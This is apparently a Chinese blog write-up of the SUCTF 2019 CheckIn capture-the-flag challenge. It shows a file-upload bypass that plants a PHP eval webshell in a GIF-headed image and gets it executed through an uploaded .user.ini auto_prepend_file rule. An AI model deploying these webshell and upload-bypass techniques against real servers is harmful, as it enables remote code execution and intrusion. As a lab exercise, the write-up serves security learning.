[SUCTF 2019]CheckIn

最新推荐文章于 2023-08-09 11:19:02 发布
最新推荐文章于 2023-08-09 11:19:02 发布
阅读量1.9k 收藏 4
点赞数 3
分类专栏: # buu练习记录 文章标签: php 开发语言 经验分享 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45925514/article/details/125085474
版权

[SUCTF 2019]CheckIn

给了一个文件上传的按钮,肯定是文件上传漏洞相关的了。

image-20220517093030407

先测试一下是不是黑名单,或者白名单。

image-20220517093204951

看来对文件的内容进行了检查,不过没关系,这个内容检查可以绕,写一个简单的script脚本,用 php 解析脚本内容 <script language='php'>eval($_POST['cmd'])</script>

image-20220517093607032

发现对文件头也有检查。对于 exif_imagetype 的功能记录一下

# exif_imagetype — 判断一个图像的类型

# 语法
exif_imagetype(string $filename): int
$filename 被检查的图像文件名。
# 返回值:如果发现了恰当的签名则返回一个对应的常量,否则返回 false

# exif_imagetype() 读取一个图像的第一个字节并检查其签名。
# 本函数可用来避免调用其它 exif 函数用到了不支持的文件类型上或和 $_SERVER['HTTP_ACCEPT'] 结合使用来检查浏览器是否可以显示某个指定的图像。

# 预定义的常量
1	IMAGETYPE_GIF
2	IMAGETYPE_JPEG
3	IMAGETYPE_PNG
4	IMAGETYPE_SWF
5	IMAGETYPE_PSD
6	IMAGETYPE_BMP
7	IMAGETYPE_TIFF_II(Intel 字节顺序)
8	IMAGETYPE_TIFF_MM(Motorola 字节顺序)
9	IMAGETYPE_JPC
10	IMAGETYPE_JP2
11	IMAGETYPE_JPX
12	IMAGETYPE_JB2
13	IMAGETYPE_SWC
14	IMAGETYPE_IFF
15	IMAGETYPE_WBMP
16	IMAGETYPE_XBM

成功上传文件了,但是后缀是不能被解析的,说明这是一个黑名单限制,php、phtml这些大部分被过滤了。

image-20220517094908969

查了一下响应中的server,之前没看过这个服务,一查才知道,这个服务原来也是基于 NGINX 的。

OpenResty 介绍:
OpenResty(又称:ngx_openresty) 是一个基于 NGINX 的可伸缩的 Web 平台,由中国人章亦春发起,提供了很多高质量的第三方模块。
OpenResty 是一个强大的 Web 应用服务器,Web 开发人员可以使用 Lua 脚本语言调动 Nginx 支持的各种 C 以及 Lua 模块,更主要的是在性能方面,OpenResty可以 快速构造出足以胜任 10K 以上并发连接响应的超高性能 Web 应用系统。
360,UPYUN,阿里云,新浪,腾讯网,去哪儿网,酷狗音乐等都是 OpenResty 的深度用户。

---- 菜鸟教程

试试上传 .user.ini 文件。

# .xxxx.ini 文件是配置当前目录以及当前子目录的规则配置的文件,文件的中的配置会覆盖掉当前php.ini中的规则,是当前用户的配置文件
# 除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER['DOCUMENT_ROOT'] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。

# 如果是 Apache 服务器,则可以利用 .htaccess 文件,作用和 .INI 一样,只是风格上有些不一样

# 上传 .user.ini 文件内容
GIF89a			# 绕过文件头检查(单独一行,否则规则会被错误识别)
# 二选一 就可以
auto_prepend_file=文件名		在页面顶部预加载文件
auto_append_file=文件名		在页面的底部预加载文件

成功上传 .user.ini 文件,接着上传 getshell.gif 文件。

image-20220517102310100

image-20220517102436088

验证是否可用

image-20220517102500041

没有问题,直接找flag吧

image-20220517102556002

image-20220517102721720

scandir(); 不能用 scandir() ,区别在于分号结尾 。

# 代码 <script language="php">eval($_GET[cmd]);</script>  

# eval()	eval — 把字符串作为PHP代码执行;因此 eval 本身是没有命令执行的功能,只能执行php中的函数和代码。

#注意:
# eval() 函数不能执行含有 “<?php ?>” 开始/结束标签的代码, 除此之外,传入的必须是有效的 PHP 代码。所有的语句必须以分号结尾。

# php 文件系统常用函数
scandir — 列出指定路径中的文件和目录
getcwd — 取得当前工作目录
chdir — 改变目录

# php 命令执行函数
system — 执行外部程序,并且显示输出
exec — 执行一个外部程序
passthru — 执行外部程序并且显示原始输出
iKnsec
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[SUCTF 2019]CheckIn(文件上传)
记录学习,一起进步
03-27 444
[SUCTF 2019]CheckIn(文件上传)
BUUCTF:[SUCTF 2019]CheckIn
末初的CSDN博客
11-04 1265
题目地址:https://buuoj.cn/challenges#[SUCTF%202019]CheckIn 上传文件后缀名黑名单机制,常用php及相关可解析扩展名等无法成功上传 使用.user.ini构造后门 user.ini如何构造后门详情见P神:https://www.leavesongs.com/PENETRATION/php-user-ini-backdoor.html 首先制造图片马 图片马不能包含<?,使用 <script language="php">eval($.
checkin
03-18
报到 此仓库包含为测试“深层链接”教程而开发的“酒店基本入住”网站应用程序。 部署方式 通过单击以下按钮之一,您可以轻松地免费将自己的Web应用程序版本免费部署到Heroku。 起动机 最终的
glados_checkin
03-25
glados定时签到
checkin-system
05-19
2.克隆gsshop-checkin $ git clone https://github.com/GSSHOPLabs/gsshop-checkin.git $ cd gsshop-checkin $ npm install 3.启动gsshop-checkin $ node ./bin/www 4.开始开发 http://localhost:3000 5.捕获...
checkin-ncku
05-21
checkin-nckuFeature打卡完截屏并寄到信箱每天随机打卡依据上班时间,在合法时间内进行随机下班打卡依据假期日,跳过打卡日期Install yarn installUsage填入所需的帐户资讯到credential.json cp credential-template...
[SUCTF 2019]CheckIn (.htaccess和.user.ini)
开心星人的博客
08-09 535
他们的作用就是指定一个文件(1.jpg),那么该文件就会被包含在要执行的php文件中(index.php)但不知道什么原因(可能是时间限制,自动删除了),我们刚才上传的evil.jpg不在了,重新上传一下即可。然后尝试使用antsword连接,但是发现连不上,不太确定哪里出了问题。意思是如果文件中有一个evil.jpg的文件,他就会被解析为.php。将后缀名改成jpg(虽然绕过了,但是解析不了,所以没啥用)尝试.htaccess和.user.ini。尝试.user.ini。成功了,但是无法解析。......
[SUCTF 2019]CheckIn 1(详解)
qq_52843575的博客
12-12 5958
1.基础检测 进入页面是一个简单文件上传界面,正常上传文件,发现上传空内容的jpg文件显示(exif_imagetype:not image!),可知有内容检测,上传代码文件也发现后缀名过滤 开始抓包操作,因为后缀名验证,伪造文件属性也失效了,与此同时发现“?”被过滤了简单利用 2.解题关键 这道题解题关键在于怎样突破后缀名绕过,就得利用.user.ini文件留后门了 user.ini留后门原理 简单来说,就是利于.user.ini指定文件,在其当前目录下的文件执行时会将你指定的文件中的代码执行出
[SUCTF2019]详详详解(web萌新头秃了已经)
最新发布
Rick66Ashley的博客
08-09 156
keypoint1:再MySQL中“||”的表示或运算,运算的时候,只要左右两边有一个为真或者大于0,则判定为真,结果为1,若都为0,那么判定为假,结果为0;这样的句子假如我的show databases正常可行的话,则其应该单独成句,那样撕裂了PHP超全局变量$GET['query']的语法结构,那我的输入无效,那么这里在逻辑上矛盾了;select *,1||flag from Flag,前面的是通配符,而后面的结果必然是1。然后发现神奇的事情,输入非零的数字时,回显,且回显为1;
[SUCTF 2019] web题-CheckIn
BROTHERYY的博客
07-07 489
复现环境:buuoj.cn 尝试了各种上传绕过的方法,但依然还是不行,看了下其他大佬的wp,茅塞顿开,也说明我太菜了。 写入保存将ctf.txt改为ctf.jpg auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件 auto_append_file 表示在php代码执行完毕后加载指定的php文件 自定义的.user,ini先执行auto_prepend_file函数,auto_prepend_file 表示在php程序加载应用程序前加载指定的php文件,也就是先加
[SUCTF 2019]EasySQL
Sk1y的博客
12-19 2752
[SUCTF 2019]EasySQL 启动靶机,显示的是一个查询界面,如下
[SUCTF 2019]Pythonginx
pakho_C的博客
08-11 363
管理脚本:/usr/lib64/systemd/system/nginx.service。Nginx配置文件:/usr/local/nginx/conf/nginx.conf。程序默认存放位置:/usr/share/nginx/html。模块:/usr/lisb64/nginx/modules。日志默认存放位置:/var/log/nginx。得到flag位置:/usr/fffffflag。应用程序:/usr/sbin/nginx。配置文件存放目录:/etc/nginx。编写脚本寻找符合条件的字符:参考。..
buuctf-SUCTF 2019 CheckIn(小宇特详解)
小宇的web博客
01-22 2729
buuctf-SUCTF 2019 CheckIn(小宇特详解) 咋一看这是一道文件上传 这里先尝试一下上传一个php文件 里面写一个最简单的一句话木马就行 <?php eval(@$_POST['shell']);?> 上传试试 回显illegal suffix!(非法后缀) 这里尝试一下修改文件拓展名php5,phtml,等都没有成功 然后进行抓包,修改content-type,都是回显的illegal suffix!(非法后缀) 这里我上传一张jpg 回显<? in conten
SUCTF_2019_部分复现
Lethe's Blog
09-01 5063
Web1 CheckIn 1、进入题目后是一个简单的上传页面: 先尝试上传普通的图片马,发现会显示<? in contents!,过滤了<?,可以使用<script language='php'></scrip>绕过。 修改后再次上传发现显示exif_imagetype:not image!,还用了exif_imagetype()进行检验,可以加上GIF89a...
git checkin
05-12
你可能想问的是 git commit 命令,它用于将代码更改提交到本地 Git 仓库中。可以使用以下命令提交更改: ``` git add . # 添加所有更改 git commit -m "提交信息" # 提交更改并添加提交信息 ``` 请注意,在提交代码之前,您需要使用 git add 命令将更改添加到“暂存区”,然后才能使用 git commit 命令将更改提交到本地仓库。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iKnsec

您的鼓励,是我创作的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值